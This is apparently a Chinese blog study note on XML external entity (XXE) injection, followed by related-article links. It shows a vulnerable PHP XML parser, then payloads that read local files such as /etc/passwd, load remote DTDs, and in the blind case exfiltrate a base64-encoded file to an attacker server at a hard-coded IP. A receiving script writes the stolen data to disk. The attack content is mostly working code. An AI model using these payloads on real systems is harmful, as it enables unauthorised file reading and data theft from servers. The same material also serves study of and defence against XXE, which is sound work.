好久没学习技术了  很多东西都忘了  复习一下

测试代码

<?php

$xml = file_get_contents("php://input");

$data = simplexml_load_string($xml);

foreach ($data as $key => $value){

    echo "you  " . $key . "is  " . $value . "<br>";

}

?>

第一种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///D:/123.txt"> ]>

<user>

<test>&b;</test>

</user>

第二种方法

<?xml version="1.0" encoding="utf-8" ?>

<!DOCTYPE a [ <!ENTITY % d SYSTEM "http://host/test.dtd"> %d; ]>

<user>

<test>&b;</test>

</user>

test.dtd内容是
<!ENTITY b SYSTEM "file:///etc/passwd">

第三种方法

<!DOCTYPE a SYSTEM " http://host/test.dtd">

第四种 无回显的情况 提交

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://123.206.229.100:8888//evil.xml">
%int;
%all;
%send;
]>







服务器1.php文件




<?php file_put_contents("1.txt",$_GET['file']); ?>






服务器evil.xml文件






<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/123.txt">

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/1.php?file=%file;'>">




												


											
xml实体注入学习的更多相关文章
	

    
								
  1. 3. XML实体注入漏洞的利用与学习
		
    XML实体注入漏洞的利用与学习 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发 ...
    
		
    2. 
						
  2. XML实体注入漏洞
		
    XML实体注入漏洞 测试代码1: 新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml) ...
    
		
    3. 
						
  3. 小试XML实体注入攻击
		
    基础知识 XML(Extensible Markup Language)被设计用来传输和存储数据.关于它的语法,本文不准备写太多,只简单介绍一下. XML基本知识 1 2 3 4 5 <?xml ...
    
		
    4. 
						
  4. 2.XML实体注入漏洞攻与防
		
    XML实体注入基础 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件.执行系统命令.探测内网端口.攻击内网网站等危害. 简单了解XML以后,我们知道要在XML中使用特殊字符,需要使用实体字符 ...
    
		
    5. 
						
  5. Fortify漏洞之XML External Entity Injection(XML实体注入)
		
    继续对Fortify的漏洞进行总结,本篇主要针对  XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External  ...
    
		
    6. 
						
  6. 企业安全01-Apache solr XML实体注入漏洞CVE-2017-12629
		
    Apache solr XML 实体注入漏洞CVE-2017-12629 一.简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apac ...
    
		
    7. 
						
  7. XXE(XML External Entity attack)XML外部实体注入攻击
		
    导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...
    
		
    8. 
						
  8. XML外部实体注入 安鸾 Writeup
		
    XML外部实体注入01 XML外部实体注入,简称XXE 网站URL:http://www.whalwl.host:8016/ 提示:flag文件在服务器根目录下,文件名为flag XML用于标记电子文 ...
    
		
    9. 
						
  9. PHP xml 外部实体注入漏洞学习
		
    XML与xxe注入基础知识 1.XMl定义 XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言:可扩展的样式语言(Exten ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. IDEA如何查看maven的依赖结构
			
    打开方式: 方法一:该工具有个Maven Projects窗口,一般在右侧能够找到,如果没有可以从菜单栏打开:View>Tool Windows>Maven Projects:选择要分析的 ...
    
			
    2. 
						
  2. mac centos linux 安装PHP扩展 INTL(国际化)  ———— error: 'ext/standard/php_smart_str.h'
			
    PHP简单源码安装扩展 五个步骤: 详细说明下: cd /fujieace/php7.0/ext/intl:#进入INTL扩展目录? 在编译扩展时候需要phpize准备环境,准备程序需要获取这个目录的 ...
    
			
    3. 
						
  3. LG P2473 [SCOI2008]奖励关
			
    题目链接:P2473 [SCOI2008]奖励关 题意:有n个宝物 每次等概率抛出其中之一一共抛出k次每个宝物有一个价值 和一个前提集合只有集齐了集合中的所有宝物 才可以领取这个宝物 范围:1 < ...
    
			
    4. 
						
  4. k短路模板(洛谷P2483 [SDOI2010]魔法猪学院)(k短路,最短路,左偏树,priority_queue)
			
    你谷数据够强了,以前的A*应该差不多死掉了. 所以,小伙伴们快来一起把YL顶上去把!戳这里! 俞鼎力的课件 需要掌握的内容: Dijkstra构建最短路径树. 可持久化堆(使用左偏树,因其有二叉树结构 ...
    
			
    5. 
						
  5. OpenDCIM-19.01操作手册
			
    OpenDCIM-19.01操作手册 1. 界面标签解析 1.1  用户管理 用户管理 部门管理 用户管理被存在数据表fac_User中,包含以下字段: UserID:是管理员还是用户 Name:报表 ...
    
			
    6. 
						
  6. Codeforces Round #545 Div1 题解
			
    Codeforces Round #545 Div1 题解 来写题解啦QwQ 本来想上红的,结果没做出D.... A. Skyscrapers CF1137A 题意 给定一个\(n*m\)的网格,每个 ...
    
			
    7. 
						
  7. 【BZOJ4784】[ZJOI2017]仙人掌(Tarjan,动态规划)
			
    [BZOJ4784][ZJOI2017]仙人掌(Tarjan,动态规划) 题面 BZOJ 洛谷 题解 显然如果原图不是仙人掌就无解. 如果原图是仙人掌,显然就是把环上的边给去掉,变成若干森林连边成为仙 ...
    
			
    8. 
						
  8. [luogu4149][bzoj2599][IOI2011]Race【点分治】
			
    题目描述 给一棵树,每条边有权.求一条简单路径,权值和等于 K,且边的数量最小. 题解 比较明显需要用到点分治,我们定义\(d\)数组表示当前节点到根节点\(rt\)之间有多少个节点,也可以表示有多少 ...
    
			
    9. 
						
  9. Nowcoder | [题解-N165]牛客网NOIP赛前集训营-普及组(第二场)
			
    啊...表示一大早还没睡醒就开始打比赛(开始前一分钟的我还在桌子上趴着休眠)...表示题目思路清奇(尤其C题)...但是我还是太蒻了...\(D\)题暴力都没打...题解正式开始之前先\(\%\)一下 ...
    
			
    10. 
						
  10. kafka命令行脚本使用
			
    zookeeper集群部署:http://www.cnblogs.com/ding2016/p/8280696.html kafka集群部署:http://www.cnblogs.com/ding20 ...
    
			
    11.